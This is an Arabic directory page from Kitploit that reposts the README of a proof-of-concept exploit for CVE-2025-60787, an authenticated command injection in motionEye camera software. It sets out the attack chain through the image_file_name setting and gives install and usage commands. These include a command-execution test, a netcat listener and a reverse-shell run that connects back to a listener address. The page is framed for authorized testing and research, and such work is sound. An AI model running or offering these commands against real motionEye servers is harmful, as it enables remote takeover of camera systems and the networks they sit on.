Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-60787 — CVE-2025-60787 motionEye حقن أوامر موثّق يؤدي إلى تنفيذ أوامر عن بعد (RCE) - إثبات المفهوم (PoC) | Kitploit
أدوات/GitHubGitHub/ozcanpng/cve-2025-60787
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرةالفريق الأحمر
GitHubozcanpng/cve-2025-60787

CVE-2025-60787

CVE-2025-60787 motionEye حقن أوامر موثّق يؤدي إلى تنفيذ أوامر عن بعد (RCE) - إثبات المفهوم (PoC)

عرض المستودع
2منذ 2 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-60787 — ثغرة تنفيذ أوامر عن بُعد مصادق عليها في motionEye

إثبات اختراق (PoC) لحقن أوامر مصادق عليه لـ CVE-2025-60787. يقوم motionEye v0.43.1b4 والإصدارات الأقدم بكتابة قيم إعدادات الكاميرا التي يتحكم بها المستخدم مثل image_file_name في إعدادات Motion دون تعقيم كافٍ، مما يسمح بتنفيذ الأوامر عند معالجة القيمة.

للاستخدام في الاختبارات والأبحاث المصرح بها فقط. لا تستخدمه ضد أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها.


ما يفعله

root@kitploit:~
Signed API request -> camera config update -> image_file_name injection -> snapshot trigger -> command execution
  1. يتحقق من الهدف ويكتشف motionEye.
  2. يُنشئ طلبات API موقعة من motionEye باستخدام اسم المستخدم وهاش كلمة المرور المُهيأين.
  3. يقرأ إعدادات الكاميرا عبر /config/list/.
  4. يحقن أمرًا في إعداد image_file_name للكاميرا.
  5. يُفعّل الصور الثابتة/اللقطات اليدوية عند الحاجة.
  • يُشغّل /action/<camera_id>/snapshot/ لكي يقوم motionEye بمعالجة اسم الملف المحقون.
  • يستعيد اختياريًا إعدادات الكاميرا الأصلية.

  • لقطات الشاشة

    إعداد الصدفة العكسية

    Reverse shell setup

    حقن الإعدادات والتشغيل

    Configuration injection and trigger

    استلام الصدفة

    Shell received


    الإعداد

    root@kitploit:~
    git clone https://github.com/ozcanpng/CVE-2025-60787.git
    cd CVE-2025-60787
    pip install -r requirements.txt
    

    الاستخدام

    إثبات الأمر الآمن

    root@kitploit:~
    python3 CVE-2025-60787.py \
      --target http://127.0.0.1:8765 \
      --user admin \
      --password-hash HASH \
      --cmd 'id > /tmp/motioneye_rce'
    

    الصدفة العكسية

    ابدأ مستمعًا أولاً:

    root@kitploit:~
    rlwrap nc -lvnp 4444
    

    ثم شغّل:

    root@kitploit:~
    python3 CVE-2025-60787.py \
      --target http://127.0.0.1:8765 \
      --port 8765 \
      --user admin \
      --password-hash HASH \
      --reverse-shell \
      --lhost 10.10.16.53 \
      --lport 4444
    

    خيارات مفيدة:

    root@kitploit:~
    --camera-id N      Camera ID to modify (default: 1)
    --restore          Restore the original camera configuration after triggering
    --dry-run          Build signed requests without modifying the target
    --debug            Print canonical signed paths, bodies and signatures
    --no-trigger       Update config without triggering a snapshot
    --verify-tls       Verify HTTPS certificates
    --yes              Skip reverse-shell confirmation prompt
    

    المتأثر

    المنتجالإصدار المتأثرالوصول المطلوبالتأثير
    motionEye<= 0.43.1b4وصول إداري/API مصادق عليهتنفيذ أوامر نظام التشغيل كمستخدم عملية motionEye/Motion

    تعتمد الامتيازات الناتجة على كيفية نشر motionEye. في الحاويات أو صور المختبر التي تشغل الخدمة كجذر (root)، يمكن أن يصل تنفيذ الأوامر إلى صلاحيات الجذر.


    ملاحظات

    • يتوقع إثبات الاختراق (PoC) قيمة/هاش كلمة مرور motionEye المخزنة لأن تلك القيمة تُستخدم كمفتاح توقيع لطلبات API القديمة.
    • الحقل المحقون هو image_file_name.
    • استخدم --restore أثناء الاختبار لإعادة إعدادات الكاميرا الأصلية بعد الاستغلال.
    • فضل استخدام --cmd للتحقق الآمن قبل محاولة الصدفة العكسية.

    المراجع

    • NVD — CVE-2025-60787
    • GitHub Security Advisory — GHSA-j945-qm58-4gjx
    • motionEye project

    المؤلف

    ozcanpng — github.com/ozcanpng — ozcanpng.dev

    تنزيل الأداة